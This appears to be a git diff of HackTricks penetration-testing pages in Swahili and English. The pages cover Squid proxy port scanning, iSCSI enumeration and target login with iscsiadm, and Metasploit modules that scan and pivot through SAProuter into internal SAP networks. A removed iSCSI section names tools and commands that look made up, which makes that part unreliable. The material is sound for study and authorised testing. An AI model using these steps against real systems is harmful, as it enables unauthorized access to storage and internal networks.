Kwa upande mwingine, Skana ya Bandari Zilizofunguliwa za Squid Pivoting ([spose.py](https://github.com/aancw/spose)) inaweza kutumika.
Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used.
```bash
python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

136
network-services-pentesting/3260-pentesting-iscsi.md
View file

@ -1,143 +1,92 @@
# 3260 - Pentesting ISCSI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):
From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):
> Katika kompyuta, **iSCSI** ni kifupi cha **Internet Small Computer Systems Interface**, kiwango cha mtandao wa uhifadhi wa data kwa msingi wa Itifaki ya Mtandao wa Itifaki (IP) kwa ajili ya kuunganisha vituo vya uhifadhi wa data. Inatoa ufikiaji wa ngazi ya block kwa vifaa vya uhifadhi kwa kubeba amri za SCSI juu ya mtandao wa TCP/IP. iSCSI hutumiwa kurahisisha uhamisho wa data juu ya mitandao ya ndani na kusimamia uhifadhi kwa umbali mrefu. Inaweza kutumika kuhamisha data juu ya mitandao ya eneo la ndani (LANs), mitandao ya eneo kubwa (WANs), au Mtandao na inaweza kuwezesha uhifadhi na upatikanaji wa data usio na kikomo kwa eneo.
> In computing, **iSCSI** ni kifupi cha **Internet Small Computer Systems Interface**, kiwango cha mtandao wa kuhifadhi data kilichotegemea Itifaki ya Mtandao (IP) kwa ajili ya kuunganisha vituo vya kuhifadhi data. Inatoa ufikiaji wa kiwango cha block kwa vifaa vya kuhifadhi kwa kubeba amri za SCSI kupitia mtandao wa TCP/IP. iSCSI inatumika kuwezesha uhamishaji wa data kupitia intraneti na kusimamia uhifadhi kwa umbali mrefu. Inaweza kutumika kuhamasisha data kupitia mitandao ya eneo la ndani (LAN), mitandao ya eneo pana (WAN), au Mtandao na inaweza kuwezesha uhifadhi na upatikanaji wa data bila kujali eneo.
>
> Itifaki hii inaruhusu wateja (inayoitwa initiators) kutuma amri za SCSI (CDBs) kwa vifaa vya uhifadhi (malengo) kwenye seva za mbali. Ni itifaki ya mtandao wa eneo la uhifadhi (SAN), kuruhusu shirika kuunganisha uhifadhi katika safu za uhifadhi wakati inatoa wateja (kama vile seva za database na wavuti) na hisia ya diski za SCSI zilizounganishwa kwa eneo. Inashindana sana na Fibre Channel, lakini tofauti na Fibre Channel ya jadi ambayo kawaida inahitaji nyaya maalum, iSCSI inaweza kukimbia kwa umbali mrefu kwa kutumia miundombinu ya mtandao iliyopo.
> Itifaki hii inaruhusu wateja (wanaoitwa waanzilishi) kutuma amri za SCSI (CDBs) kwa vifaa vya kuhifadhi (malengo) kwenye seva za mbali. Ni itifaki ya mtandao wa eneo la kuhifadhi (SAN), ikiruhusu mashirika kuunganisha uhifadhi katika mfululizo wa kuhifadhi huku ikitoa wateja (kama vile seva za database na wavuti) hisia ya diski za SCSI zilizounganishwa kwa ndani. Inashindana hasa na Fibre Channel, lakini tofauti na Fibre Channel ya jadi ambayo kawaida inahitaji nyaya maalum, iSCSI inaweza kuendeshwa kwa umbali mrefu kwa kutumia miundombinu ya mtandao iliyopo.
**Bandari ya chaguo-msingi:** 3260
**Default port:** 3260
```
PORT STATE SERVICE VERSION
3260/tcp open iscsi?
```
## Uchambuzi
### iSCSI
iSCSI ni itifaki ya mtandao inayotumiwa kuhamisha data kati ya seva na vifaa vya kuhifadhi. Katika hatua ya uchambuzi, tunaweza kutumia njia kadhaa za kuchunguza na kuchunguza mazingira ya iSCSI.
#### Kugundua Huduma ya iSCSI
Kwa kugundua huduma ya iSCSI, tunaweza kutumia zana kama Nmap au iSCSI Discovery Utility. Zana hizi zinaweza kutusaidia kupata seva za iSCSI zinazopatikana kwenye mtandao.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye Nmap:
```plaintext
nmap -p 3260 --script iscsi-info <IP>
```
#### Kuchunguza Huduma ya iSCSI
Baada ya kugundua seva ya iSCSI, tunaweza kuchunguza huduma hiyo kwa kutumia zana kama iSCSI Discovery Utility au iSCSI Initiator. Zana hizi zinaweza kutusaidia kuchunguza na kuingiliana na seva ya iSCSI.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Discovery Utility:
```plaintext
iscsiadm -m discovery -t sendtargets -p <IP>
```
#### Kuchunguza Huduma ya iSCSI kwa Kutumia Wireshark
Wireshark ni zana yenye nguvu ya uchambuzi wa trafiki ya mtandao. Tunaweza kutumia Wireshark kuchunguza mawasiliano ya iSCSI na kuchambua data inayopitishwa kati ya seva na vifaa vya kuhifadhi.
Kwa mfano, tunaweza kufuatilia trafiki ya iSCSI kwa kuchagua kichujio cha "iscsi" kwenye Wireshark.
#### Kuchunguza Huduma ya iSCSI kwa Kutumia iSCSI Authentication Bypass
Katika hali fulani, tunaweza kujaribu kuchunguza huduma ya iSCSI kwa kutumia mbinu za kuvuka uthibitishaji wa iSCSI. Hii inaweza kuhusisha kutumia zana kama iSCSI Target Tester au iSCSI Security Scanner.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Target Tester:
```plaintext
iscsi-target-tester -t <IP> -p 3260 -a
```
#### Kuchunguza Huduma ya iSCSI kwa Kutumia iSCSI Exploitation Framework
Ikiwa tunataka kuchunguza zaidi huduma ya iSCSI, tunaweza kutumia iSCSI Exploitation Framework. Hii ni zana yenye nguvu ambayo inaruhusu kuchunguza na kuchunguza udhaifu katika huduma ya iSCSI.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Exploitation Framework:
```plaintext
iscsi-exploit-framework -t <IP> -p 3260
```
Kwa kufuata njia hizi za uchambuzi, tunaweza kupata habari muhimu na kuchunguza mazingira ya iSCSI kwa ufanisi.
## Uhesabuzi
```
nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx
```
Hati hii itaonyesha ikiwa uwakiki unahitajika.
This script will indicate if authentication is required.
### [Nguvu ya nguvu](../generic-methodologies-and-resources/brute-force.md#iscsi)
### [Brute force](../generic-methodologies-and-resources/brute-force.md#iscsi)
### [Funga ISCSI kwenye Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux)
### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux)
**Note:** Unaweza kugundua kuwa malengo yako yanapatikana chini ya anwani tofauti ya IP. Hii mara nyingi hutokea ikiwa huduma ya iSCSI inafunuliwa kupitia NAT au anwani ya IP ya kubadilishwa. Katika kesi kama hizi, `iscsiadmin` itashindwa kuunganisha. Hii inahitaji marekebisho mawili: moja kwa jina la saraka ya nodi iliyoanzishwa moja kwa moja na shughuli zako za ugunduzi, na moja kwa faili ya `default` iliyomo ndani ya saraka hii.
**Note:** Unaweza kupata kwamba wakati malengo yako yanagunduliwa, yanatajwa chini ya anwani tofauti ya IP. Hii hutokea ikiwa huduma ya iSCSI imewekwa wazi kupitia NAT au IP ya virtual. Katika hali kama hizi, `iscsiadmin` itashindwa kuungana. Hii inahitaji marekebisho mawili: moja kwa jina la saraka ya node iliyoundwa kiotomatiki na shughuli zako za kugundua, na moja kwa faili ya `default` iliyo ndani ya saraka hii.
Kwa mfano, unajaribu kuunganisha kwenye lengo la iSCSI kwenye 123.123.123.123 kwenye bandari 3260. Seva inayofunua lengo la iSCSI iko kwa kweli kwenye 192.168.1.2 lakini inafunuliwa kupitia NAT. isciadm itasajili anwani ya _ndani_ badala ya anwani ya _umma_:
Kwa mfano, unajaribu kuungana na lengo la iSCSI kwenye 123.123.123.123 kwenye bandari 3260. Server inayoweka wazi lengo la iSCSI iko kwa kweli kwenye 192.168.1.2 lakini imewekwa wazi kupitia NAT. isciadm itarekodi anwani ya _ndani_ badala ya anwani ya _umma_:
```
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[...]
```
Amri hii itaunda saraka katika mfumo wako wa faili kama ifuatavyo:
Hii amri itaunda saraka katika mfumo wako wa faili kama hii:
```
/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/
```
Ndani ya saraka, kuna faili ya chaguo-msingi na mipangilio yote inayohitajika kuunganisha kwenye lengo.
Katika saraka, kuna faili ya default yenye mipangilio yote muhimu kuungana na lengo.
1. Badilisha jina la `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` kuwa `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/`
2. Ndani ya `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, badilisha mipangilio ya `node.conn[0].address` ili ielekeze kwa 123.123.123.123 badala ya 192.168.1.2. Hii inaweza kufanywa kwa amri kama `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`
2. Ndani ya `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, badilisha mipangilio ya `node.conn[0].address` ili kuelekeza kwenye 123.123.123.123 badala ya 192.168.1.2. Hii inaweza kufanywa kwa amri kama `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`
Sasa unaweza kufunga lengo kulingana na maagizo kwenye kiungo.
Sasa unaweza kuunganisha lengo kulingana na maelekezo katika kiungo.
### [Funga ISCSI kwenye Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN)
### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN)
## **Uchunguzi wa mwongozo**
## **Uhesabu wa mikono**
```bash
sudo apt-get install open-iscsi
```
Mfano kutoka [hati za iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm):
Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm):
Kwanza kabisa unahitaji **kugundua majina ya malengo** nyuma ya anwani ya IP:
Kwanza kabisa unahitaji **kuvumbua majina ya malengo** nyuma ya IP:
```bash
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382
[fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382
```
_Note kwamba itaonyesha I**P na bandari ya interfaces** ambapo unaweza **kufikia** malengo hayo. Inaweza hata **kuonyesha IPs za ndani au IPs tofauti** na ile uliyotumia._
_Note kwamba itaonyesha I**P na bandari za interfaces** ambapo unaweza **kufikia** hizo **malengo**. Inaweza hata **kuonyesha IP za ndani au IP tofauti** kutoka ile uliyotumia._
Kisha **unakamata sehemu ya pili ya herufi iliyochapishwa ya kila mstari** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ kutoka kwa mstari wa kwanza) na **jaribu kuingia**:
Kisha **shika sehemu ya 2 ya mfuatano wa maandiko ya kila mstari** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ kutoka mstari wa kwanza) na **jaribu kuingia**:
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login
Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple)
Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
```
Kisha, unaweza **kutoka** kwa kutumia `logout`
Kisha, unaweza **logout** ukitumia `logout`
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout
Logging out of session [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260]
Logout of [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
```
Tunaweza kupata **mashauri zaidi** kuhusu hilo kwa kutumia **bila** kutumia `--login`/`--logout` parameter.
Tunaweza kupata **maelezo zaidi** kuhusu hilo kwa kutumia tu **bila** parameter yoyote ya `--login`/`--logout`
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260
# BEGIN RECORD 2.0-873
@ -213,27 +162,28 @@ node.conn[0].iscsi.IFMarker = No
node.conn[0].iscsi.OFMarker = No
# END RECORD
```
**Kuna script ya kiotomatiki ya kuchunguza mitandao ya subnet inapatikana kwenye** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm)
**Kuna skripti ya kuandaa mchakato wa msingi wa kuhesabu subnet inapatikana kwenye** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm)
## **Shodan**
* `port:3260 AuthMethod`
## **Marejeo**
## **Marejeleo**
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

71
network-services-pentesting/3299-pentesting-saprouter.md
View file

@ -1,63 +1,66 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
Hii ni muhtasari wa chapisho kutoka [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
## Kuelewa Uvamizi wa SAProuter na Metasploit
## Kuelewa Uvunjaji wa SAProuter kwa Metasploit
SAProuter hufanya kazi kama kisanduku cha mbele (reverse proxy) kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao na mitandao ya ndani ya SAP. Kawaida, SAProuter inafunguliwa kwa mtandao kwa kuruhusu bandari ya TCP 3299 kupitia kwenye firewall ya shirika. Hali hii inafanya SAProuter kuwa lengo la kuvutia kwa upimaji wa uvamizi kwa sababu inaweza kutumika kama lango kuelekea mitandao ya ndani yenye thamani kubwa.
SAProuter inafanya kazi kama proxy ya kinyume kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao wa intaneti na mitandao ya ndani ya SAP. Mara nyingi inakabiliwa na mtandao wa intaneti kwa kuruhusu bandari ya TCP 3299 kupitia moto wa shirika. Mpangilio huu unafanya SAProuter kuwa lengo la kuvutia kwa pentesting kwa sababu inaweza kutumikia kama lango la mitandao ya ndani yenye thamani kubwa.
**Uchunguzi na Kukusanya Taarifa**
**Kuchunguza na Kukusanya Taarifa**
Kwanza, uchunguzi hufanywa ili kutambua kama kuna SAProuter inayofanya kazi kwenye anwani ya IP iliyotolewa kwa kutumia moduli ya **sap_service_discovery**. Hatua hii ni muhimu kwa ajili ya kubainisha uwepo wa SAProuter na bandari yake iliyofunguliwa.
Kwanza, uchunguzi unafanywa kubaini ikiwa SAP router inafanya kazi kwenye IP fulani kwa kutumia moduli ya **sap_service_discovery**. Hatua hii ni muhimu kwa kuanzisha uwepo wa SAP router na bandari yake iliyo wazi.
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
```
Baada ya ugunduzi huo, uchunguzi zaidi kuhusu usanidi wa SAP router unafanywa kwa kutumia moduli ya **sap_router_info_request** ili kufichua taarifa za ndani za mtandao.
Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details.
Baada ya kugundua, uchunguzi zaidi wa usanidi wa SAP router unafanywa kwa kutumia moduli ya **sap_router_info_request** ili uweze kufichua maelezo ya mtandao wa ndani.
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run
```
**Kuorodhesha Huduma za Ndani**
**Kuhesabu Huduma za Ndani**
Kwa ufahamu wa mtandao wa ndani uliopatikana, moduli ya **sap_router_portscanner** hutumiwa kuchunguza watumishi na huduma za ndani kupitia SAProuter, kuruhusu ufahamu zaidi wa mitandao ya ndani na mipangilio ya huduma.
Kwa ufahamu wa mtandao wa ndani ulio pata, moduli ya **sap_router_portscanner** inatumika kuchunguza mwenyeji wa ndani na huduma kupitia SAProuter, ikiruhusu kuelewa kwa undani mitandao ya ndani na usanidi wa huduma.
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
```
Moduli huu wa ufanisi katika kulenga kesi maalum za SAP na bandari unafanya kuwa zana yenye nguvu kwa ajili ya uchunguzi wa kina wa mtandao wa ndani.
Moduli huu una uwezo wa kubadilika katika kulenga mifano maalum ya SAP na bandari, na kufanya kuwa chombo chenye ufanisi kwa uchunguzi wa kina wa mtandao wa ndani.
**Uchunguzi wa Juu na Kupanga ACL**
**Uhesabuji wa Juu na Ramani za ACL**
Uchunguzi zaidi unaweza kufunua jinsi Orodha za Kudhibiti Upatikanaji (ACLs) zilivyojengwa kwenye SAProuter, ikifafanua ni uhusiano gani unaoruhusiwa au kuzuiliwa. Taarifa hii ni muhimu katika kuelewa sera za usalama na udhaifu unaowezekana.
Kuchunguza zaidi kunaweza kufichua jinsi Orodha za Udhibiti wa Ufikiaji (ACLs) zilivyowekwa kwenye SAProuter, zikielezea ni muunganisho gani unaruhusiwa au kuzuia. Taarifa hii ni muhimu katika kuelewa sera za usalama na uwezekano wa udhaifu.
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**Uchunguzi wa Kipofu wa Wenyewe kwa Wenyewe wa Wenyewe**
**Blind Enumeration of Internal Hosts**
Katika hali ambapo habari moja kwa moja kutoka kwa SAProuter ni mdogo, mbinu kama uchunguzi wa kipofu unaweza kutumika. Mbinu hii inajaribu kudhani na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, kuonyesha malengo yanayowezekana bila anwani za IP moja kwa moja.
Katika hali ambapo taarifa za moja kwa moja kutoka kwa SAProuter ni chache, mbinu kama vile blind enumeration zinaweza kutumika. Njia hii inajaribu kukisia na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, ikifunua malengo yanayoweza kuwa bila anwani za IP za moja kwa moja.
**Kutumia Habari kwa Ajili ya Upimaji wa Kuingilia**
**Leveraging Information for Penetration Testing**
Baada ya kuchora ramani ya mtandao na kutambua huduma zinazopatikana, wapimaji wa kuingilia wanaweza kutumia uwezo wa wakala wa Metasploit kuhamia kupitia SAProuter kwa ajili ya uchunguzi na utumiaji zaidi wa huduma za ndani za SAP.
Baada ya kuchora ramani ya mtandao na kubaini huduma zinazopatikana, wapimaji wa penetration wanaweza kutumia uwezo wa proxy wa Metasploit kuhamasisha kupitia SAProuter kwa ajili ya uchunguzi zaidi na unyakuzi wa huduma za ndani za SAP.
```text
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
@ -65,10 +68,9 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**Hitimisho**
Njia hii inasisitiza umuhimu wa mipangilio salama ya SAProuter na inaonyesha uwezekano wa kupata mitandao ya ndani kupitia upimaji wa kuingilia kwa lengo. Kusalimisha vizuri rutuba za SAP na kuelewa jukumu lao katika usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa habari zaidi kuhusu moduli za Metasploit na matumizi yao, tembelea [database ya Rapid7](http://www.rapid7.com/db).
